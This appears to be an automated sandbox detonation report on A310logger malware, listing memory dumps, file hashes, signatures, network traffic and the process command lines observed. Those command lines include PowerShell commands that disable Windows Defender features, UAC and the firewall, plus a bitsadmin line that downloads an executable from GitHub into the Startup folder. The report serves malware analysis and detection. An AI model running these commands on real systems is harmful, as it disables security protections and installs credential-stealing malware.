memory/1612-68-0x000000006EEA0000-0x000000006F44B000-memory.dmp
memory/996-71-0x0000000000000000-mapping.dmp
memory/996-72-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp
memory/1612-73-0x0000000004B50000-0x00000000051A1000-memory.dmp
memory/1452-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1452-77-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1452-79-0x0000000004CD0000-0x0000000005321000-memory.dmp
memory/1452-78-0x0000000002370000-0x0000000002FBA000-memory.dmp
memory/556-80-0x0000000000000000-mapping.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/556-84-0x0000000004BE0000-0x0000000005231000-memory.dmp
memory/556-85-0x000000006EEA0000-0x000000006F44B000-memory.dmp
memory/556-86-0x0000000002460000-0x00000000030AA000-memory.dmp
memory/1972-87-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1972-91-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1972-92-0x0000000002400000-0x000000000304A000-memory.dmp
memory/1972-90-0x0000000004CA0000-0x00000000051D6000-memory.dmp
memory/276-93-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/276-97-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/276-98-0x0000000002490000-0x00000000030DA000-memory.dmp
memory/1932-99-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1932-102-0x0000000004DD0000-0x0000000005306000-memory.dmp
memory/1932-103-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1928-104-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1928-108-0x0000000004C60000-0x0000000005196000-memory.dmp
memory/1928-109-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1452-111-0x0000000000000000-mapping.dmp
memory/1928-110-0x0000000069E10000-0x000000006A3BB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1452-115-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1452-114-0x0000000004BA0000-0x00000000050D6000-memory.dmp
memory/1452-116-0x0000000002470000-0x00000000030BA000-memory.dmp
memory/556-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/556-120-0x0000000004C50000-0x0000000005186000-memory.dmp
memory/556-121-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1504-122-0x0000000000000000-mapping.dmp
memory/556-123-0x0000000002460000-0x00000000030AA000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1504-127-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1504-129-0x0000000002280000-0x0000000002ECA000-memory.dmp
memory/1504-128-0x0000000004BC0000-0x00000000050F6000-memory.dmp
memory/1472-130-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1472-134-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1472-133-0x0000000004B30000-0x0000000005066000-memory.dmp
memory/1472-135-0x00000000023F0000-0x000000000303A000-memory.dmp
memory/600-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/600-139-0x0000000004BE0000-0x0000000005116000-memory.dmp
memory/600-140-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/600-141-0x0000000002360000-0x0000000002FAA000-memory.dmp
memory/1520-142-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1520-146-0x0000000004D20000-0x0000000005256000-memory.dmp
memory/1520-147-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1520-148-0x0000000002470000-0x00000000030BA000-memory.dmp
memory/1800-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1800-153-0x0000000000622000-0x0000000000624000-memory.dmp
memory/1800-154-0x0000000004BB0000-0x00000000050E6000-memory.dmp
memory/1800-155-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1800-152-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/864-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/864-160-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/804-161-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/804-164-0x0000000004BD0000-0x0000000005106000-memory.dmp
memory/804-165-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/768-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/768-169-0x0000000004C70000-0x00000000051A6000-memory.dmp
memory/768-170-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/2032-171-0x0000000000000000-mapping.dmp
memory/768-172-0x0000000002480000-0x00000000030CA000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/2032-176-0x0000000004C00000-0x0000000005136000-memory.dmp
memory/2032-177-0x000000006A3C0000-0x000000006A96B000-memory.dmp
memory/1716-178-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4790be1177269cd4f4de22ca7a41ccda |
| SHA1 | 15cc64148a1980a3c2cf123740ad4832fee36c5e |
| SHA256 | f5ad1fab5d11029af77d21a3e49a5e144064154065ce3df10b45142e45cc7d4d |
| SHA512 | 8ba9d690bdc40c87a6f262bd959a7fde4ee9cfc6504b5205f2a6c175d5ad35c6bc905d9a31e8488d7c93060b3d591a8b70de617dcd2caef53a0bc65755184144 |
memory/1716-181-0x0000000004BC0000-0x00000000050F6000-memory.dmp
memory/1976-182-0x0000000000000000-mapping.dmp
memory/1716-183-0x0000000069E10000-0x000000006A3BB000-memory.dmp
memory/1716-184-0x00000000023F2000-0x00000000023F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\second.bat
| MD5 | 78f1eeb670df636f57ca1ef6b9b398e7 |
| SHA1 | b54fc938f44476bc3c0fff6bdcf6ce79966e5029 |
| SHA256 | a9cc3a4df688700b12c464f2e689e80f3015f86c42f6ac2d84ab898a87371201 |
| SHA512 | 36de51183d05e85999ceed8cb9b7b859488506f32b476eaa6cb48a3b79cfd7e85e2dd3a05ae63b713b2423ce07a7a05d58a0fde870b46614cae966db4c6ce6fb |
memory/1800-187-0x0000000000000000-mapping.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/620-208-0x000000005FFF0000-0x0000000060000000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-28 18:12
Reported
2022-03-28 18:16
Platform
win10v2004-20220310-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
A310logger
UAC bypass
A310logger Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
Modifies Windows Firewall
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\525c7562.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A310Logger = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\first.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\525c7562.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\525c7562.exe
"C:\Users\Admin\AppData\Local\Temp\525c7562.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx" /o ""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Packages /download /priority foreground https://github.com/tyler617/first/releases/download/v1.0/first.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe
first.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe
first.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.exe
putty.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| FR | 2.18.109.224:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip.42.pl | udp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
| PL | 79.98.145.42:80 | ip.42.pl | tcp |
